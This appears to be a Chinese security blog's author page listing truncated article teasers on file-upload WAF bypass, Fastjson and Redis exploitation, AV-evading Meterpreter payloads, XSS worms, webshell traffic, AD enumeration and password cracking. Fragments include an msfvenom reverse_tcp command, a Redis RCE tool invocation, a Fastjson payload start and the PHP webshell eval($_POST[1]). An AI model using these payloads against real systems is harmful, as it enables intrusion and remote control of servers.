xiaohei 发布的文章

前言本文主要讨论下 文件上传和WAF的功与防。测试环境均为nginx/1.10.3PHP 5.5.34有些特性和 语言及webserver有关,有问题的地方,欢迎大家指正。文件上传的特征先来了解下文件上传的特征,抓包看看这段文件上传代码的HTTP请求。upload.php<?php if(isset($_POST['submit_x'])){ $upfile = $_.......

前言前几天护网杯比赛中,有一题关于Fastjson反序列化。有人在问为什么没有利用成功,而且比赛结束后的writeup也是用的JdbcRowSetImplEXP,所以简单看看原因。easy_web.png利用写了一份fastjson反序列化漏洞的漏洞代码,简单描述下如何利用。JdbcRowSetImpl先说针对JdbcRowSetImpl的漏洞利用。post提交:{"@ty.......

远程代码执行redis4和redis5来自https://github.com/jas502n/Redis-RCE python代码[[email protected] script]# git clone https://github.com/jas502n/Redis-RCE.git 安装redis5.0 python redis-rce.py -r 127.0.0.1 -p 6379 -.......

无意中看到go 的远程dll 过杀软的,然后就发现luan大佬的博客有一篇文章 python 的调用shellcode 的方式测试了一下原文地址:http://lu4n.com/metasploit-payload-bypass-av-note/└──╼ #msfvenom -p windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.......

连接: redis-cli -h host -p port -n db需要知道的:①Redis 基本操作,信息以键值对应的关系储存set 写入数据get 查看数据keys* 查看所有键值select db 相当于关系型数据库中的多个库,选择其中之一(Redis中的DB是相互独立存在的,所以可以出现重复的key)FLUSHALL 清空数据10.211.55.8:6379> set.......

前言XSS 自动点按钮有什么危害?在社交网络里,很多操作都是通过点击按钮发起的,例如发表留言。假如留言系统有 XSS,用户中招后除了基本攻击外,还能进行传播 —— XSS 自动填入留言内容,并模拟点击发表按钮,于是就能发布带有恶意代码的留言。好友看了中招后,又传播给他们的好友。。。从而形成蠕虫扩散。那么有没有一种机制,让「发表留言」必须通过用户的「真实点击」按钮才能完成,而无法通过脚.......

一、环境搭建宝塔Windows 6.5.0 +Nginx 1.17 + PHP 5.2 (PS:注意5.2最稳 其他版本可能报错)安装成功之后。分析代码首先找到base/appplus.php 主要代码如下://密钥校验$k=md5(strrev($dbUser.$dbPass)); $h=$_SERVER["HTTP_REFERER"]; $t=$_POS.......

1. 蚁剑流量分析环境如下靶机 windows 2008 R2 攻击机器 win10 蚁剑2.0.4 木马如下:<?php eval($_POST[1]) ?> 蚁剑编辑器有如下几种还有一种传递方式加上这个mulipart 发包之后。数据包会像如下这样multipart/form-dataPOST http://www.example.com HTTP/1.1 Con.......

0x00 前言在域渗透中,活动目录信息的获取必不可少。本文将要以获取活动目录中所有用户、所有计算机和所有组为例,介绍常用的信息获取方法。0x01 简介本文将要介绍以下内容:· 域外获取活动目录信息的方法· 域内获取活动目录信息的方法· 使用C++调用ADSI接口获取信息的方法0x02 基础知识域环境使用directory database(目录数据库)来存储用户、计算机账户和组等对象.......

0x00 前言天下武功,唯快不破。但在密码学中则不同。算法越快,越容易破。0x01 暴力破解密码破解(严格地说应该是账号口令的破解),就是把散列值还原成明文口令。这貌似有不少方法,但事实上都得走一条路:暴力穷举。(也许你会说还可以查表,瞬间就出结果。虽然查表不用穷举,但表的制造过程仍然需要。查表只是将穷举提前了而已)因为散列计算是单向的,是不可逆的,所以只能穷举。穷举的原理很简单。只.......